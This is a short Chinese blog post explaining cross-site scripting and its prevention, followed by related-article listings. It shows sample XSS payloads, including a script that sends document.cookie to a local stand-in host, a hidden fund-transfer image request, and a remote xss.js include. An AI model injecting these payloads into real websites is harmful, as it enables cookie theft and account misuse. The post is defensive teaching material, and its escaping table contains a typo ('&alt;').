简述XSS攻击及其防范措施

最新推荐文章于 2024-08-16 18:08:04 发布
最新推荐文章于 2024-08-16 18:08:04 发布
阅读量7.4k 收藏 6
点赞数
分类专栏: 前端开发 网络相关 文章标签: 全端开发
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/i_dont_know_a/article/details/80560940
版权

只要功能不是太过单一的网站,就肯定会有需要用户输入的地方,即使是最简单的登录,也是需要用户输入的地方。

 

但是并不是每一个网站都对用户的输入进行了防范。

 

言外之意,用户的输入可能对网站的安全性构成威胁,这是怎么回事呢?

 

这就涉及到一个专业名词了:XSS

 

 

XSS(360百科)

 

跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

 

 

▍通俗来说

 

通俗点说,就是通过在css或者html里嵌入一些恶意的Javascript代码,从而实现恶意攻击的目的。

 

那么这些Javascript代码又是如何嵌入进去的呢?

 

 

XSS方式

 

1、 输入框中直接输入恶意脚本,如:

 

"><script>alert(document.cookie)</script>

或者

<script>document.location.href = 'http://127.0.0.1:9090/xss?foo=' + document.cookie</script>

2、输入框中输入html标签,在标签中嵌入恶意脚本,如src,href,css,style等。

 

<img src="javascript:alert('XSS');" />
<img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />
<body background="javascript:alert('XSS');"></body>
<style>
    li{
        list-style-image: url("javascript:alert('XSS');");
    }
</style>

<li>XSS</li>

 

3、将恶意脚本注入在event事件中,如onClick,onBlur,onMouseOver等事件。

<a onmouseover="alert(document.cookie)">
     xxslink
</a>

4、在remote style sheet,javascript中,如

 

<link rel="stylesheet" href="javascript:alert('XSS');" />
<script src="http://ha.ckers.org/xss.js"></script>

5、meta标签,如

<meta http-equiv="refresh" content="5" />
<meta http-equiv="set-cookie" content="usetid=<script>alert('XSS')</script>" />

▍切记切记

 

用于不要把任何来自用户的内容放到下面这些地方:

 

  • script标签:<script> not here </script>
  • html注释:<!-- not here -->
  • 标签名:<nothere href="/test.html" />
  • 属性:<div nothere="nothere" />
  • css值:{color : not here}

 

 

▍防范方法

 

网上防范XSS攻击的方法一搜就一大堆,但是无论方法有多少,始终是万变不离其宗。

 

1、转义用户的内容

 

a、HTML:对以下这些字符进行转义:

 

  • &:&amp;
  • <:&alt;
  • >:&gt;
  • ':&#x27;
  • ":&quot;
  • /:&#x2F;

 

b、Javascript:把所有非字母、数字的字符都转义成小于256的ASCII字符;

 

c、URL:使用Javascript的encodeURIComponent()方法对用户的输入进行编码,该方法会编码如下字符:,      /      ?     :     @     &     =     +     $     #

 

2、添加用户生成的内容

 

a、Javascript:使用textContent或者innerText,而不能使用innerHTML;

 

b、jquery:使用text(),而不能使用html();

 

 

▍我是尾巴

 

目前自己的个人博客也在创建中,博客可能会开通留言功能,这样的话英雄就有用武之地了。

 

关注公众号:爱唱歌的蜗牛先生

门时
关注
专栏目录
.net core xss攻击防御的方法
10-18
.NET Core XSS攻击防御方法的知识点可以详细阐述如下: 首先,XSS攻击全称跨站脚本攻击,它是一种常见的网络安全漏洞。攻击者利用这一漏洞,在Web页面中植入恶意脚本代码,当其他用户浏览这些页面时,嵌入的恶意...
Java防止Xss注入json_【知识点】6个XSS的防御小技巧
weixin_39580041的博客
11-20 505
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。作者:la...
过滤关键字防止XSS攻击
weixin_30950887的博客
11-30 814
public static string ClearXSS(string str) { string returnValue = str; if (string.IsNullOrEmpty(returnValue)) { return string.Empty; } ///过滤C...
XSS-跨站脚本攻击
最新发布
qq_64177395的博客
08-16 1522
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets )的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往web页面里插入恶意script代码,当用户浏览该页时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的1.2 XSS类型反射型也称为非持久型,这种类型的脚本是最常见的,也是使用最为广泛的一种,主要用于将恶意的脚本附加到URL地址的参数中。
如何防止XSS攻击
m0_49521873的博客
05-23 6669
3. 设置HTTP头部:设置HTTP头部,包括Content-Security-Policy、X-Content-Type-Options、X-XSS-Protection等,来使浏览器拦截来自第三方资源的恶意脚本。4. 使用脚本过滤器:使用脚本过滤器,如Google的Closure Library和jQuery库等,能够对来自用户的数据进行过滤和检查。2. 转义特殊字符:在网页中用户输入的内容需要使用转义字符,例如将 < 转义成 <,将 > 转义成 >,避免浏览器将这些字符误解为标签等。
XSS攻击及防御
热门推荐
寻道
11-29 20万+
本文来自:高爽|Coder,原文地址:http://blog.csdn.net/ghsau/article/details/17027893,转载请注明。 XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的H...
XSS如何防范
qq_45803050的博客
11-27 8248
XSS如何防范 题意分析 在 Web 安全领域中,XSS 和 CSRF 是最常见的攻击方式。下面我们首先简单了解一下什么是 XSS 和 CSRF 。 XSS,即 Cross Site Script,中译是跨站脚本攻击;其原本缩写是 CSS,但为了和层叠样式表(Cascading Style Sheet)有所区分,因而在安全领域叫做 XSS。XSS 攻击是指攻击者在网站上注入恶意的客户端代码,通过恶意脚本对客户端网页进行篡改,从而在用户浏览网页时,对用户浏览器进行控制或者获取用户隐私数据的一种攻击方式。攻击者
XSS攻击及防范
橘猫吃不胖的博客
02-06 1245
XSS攻击及防范 1 什么是XSS 2 XSS类型 2.1 反射型XSS 2.2 存储型XSS 2.3 DOM型XSS 3 怎么预防XSS 3.1 纯前端渲染 3.2 转义HTML 3.3 关注高危API 3.4 其他措施
Web安全之XSS攻击与防御小结
02-23
跨站脚本攻击(CrossSiteScripting),缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。攻击者对含有漏洞的服务器发起...
web安全之XSS攻击及防御pdf
08-25
针对XSS漏洞的有效防御措施主要包括以下几个方面: - **输入验证**:在接收到用户输入的数据之前,对其进行严格的验证,确保只接受预期格式的数据。 - **输出转义**:在将用户数据输出到页面上时,进行转义处理,...
8、XSS 攻击的防御pdf资料
10-15
为了防御XSS攻击开发者需要采取一系列措施,包括但不限于: - 对用户输入进行严格的过滤和转义,确保任何可能包含恶意脚本的数据在显示之前都被安全处理。 - 使用HTTP头部的Content-Security-Policy(CSP)来限制...
XSS攻击常识及常见的XSS攻击脚本汇总.pdf
12-26
XSS攻击常识及常见的XSS攻击脚本汇总
【web安全】XSS攻击(跨站脚本攻击)如何防范与实现
AA2534193348的博客
05-31 5171
XSS攻击(跨站脚本攻击)是一种常见的Web安全漏洞,攻击者在Web页面中插入恶意脚本代码,并在受害人访问该页面时执行脚本代码,从而获取用户敏感信息、操作受害人账号或篡改页面内容等不当行为。XSS攻击可以通过输入表单、搜索框、评论区等途径实现,因此对于Web开发人员来说,要采取相应的措施预防和修复XSS漏洞,以确保用户数据的安全。
【转】XSS的两种攻击方式及五种防御方式
tpriwwq的专栏
11-05 4229
XSS攻击介绍及防御方法
XSS漏洞类型原理及防御方式
weixin_54786196的博客
10-15 822
XSS全称是Cross Site Scripting即跨站脚本,为了与层叠样式表Cascading Style Sheets,CSS)的缩写进行区分,将跨站脚本攻击缩写为XSS,其本质是攻击者在web页面插入恶意的script代码(这个代码可以是JS脚本、CSS样式或者其他意料之外的代码),当用户浏览该页面之时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。
XSS漏洞注入,分类,防御方法
Y22Lee的博客
04-06 3739
XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,仅次于SQL注入。XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。由此可知,XSS属于客户端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一。
防范 XSS 攻击的措施
程序猿徐师兄的博客
07-13 2983
XSS 攻击是一种跨站点脚本攻击,攻击者通过在 Web 页面中注入 JavaScript 代码,从而利用用户浏览器的漏洞执行恶意操作。攻击者可以通过各种方式注入恶意脚本,包括通过表单、URL 参数、cookie 和 HTTP 头等。攻击者可以通过 XSS 攻击窃取用户的敏感信息,如用户名、密码、银行账户等,或者执行恶意操作,如重定向用户到一个恶意网站、发送恶意邮件等。XSS 攻击是一种常见的网络安全漏洞,攻击者通过注入恶意脚本来攻击用户的计算机和浏览器。
XSS漏洞类型原理及防御方式_三种xss漏洞防御,2024年最新带你全面掌握高级知识点
uiuuyy67的博客
04-15 3105
XSS全称是Cross Site Scripting即跨站脚本,为了与层叠样式表Cascading Style Sheets,CSS)的缩写进行区分,将跨站脚本攻击缩写为XSS,其本质是攻击者在web页面插入恶意的script代码(这个代码可以是JS脚本、CSS样式或者其他意料之外的代码),当用户浏览该页面之时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。
XSS漏洞类型原理及防御方式_三种xss漏洞防御,扫地阿姨看完都学会了
2401_84434936的博客
04-17 1246
DOM中有很多对象,其中一些是用户可以操纵的,如URI ,location,refelTer等。DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式,DOM-XSS简单理解就是不与后台服务器产生数据交互,是一种通过DOM操作前端代码输出的时候产生的问题。可以看到js代码再次执行了,留言列表也出现了,我们的js脚本存放再列表中,当我们进入页面时,浏览器会解析页面,列表中的数据也会被解析,那js脚本被解析就会执行。
简述XSS的攻击原理、过程及防范措施
05-18
XSS(Cross-site scripting)攻击是一种常见的网络安全漏洞,攻击者通过在网页注入恶意脚本,当用户访问该页面时,恶意脚本将会执行,从而使攻击者得以窃取用户的敏感信息或控制用户的账户。 攻击原理: XSS攻击的...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值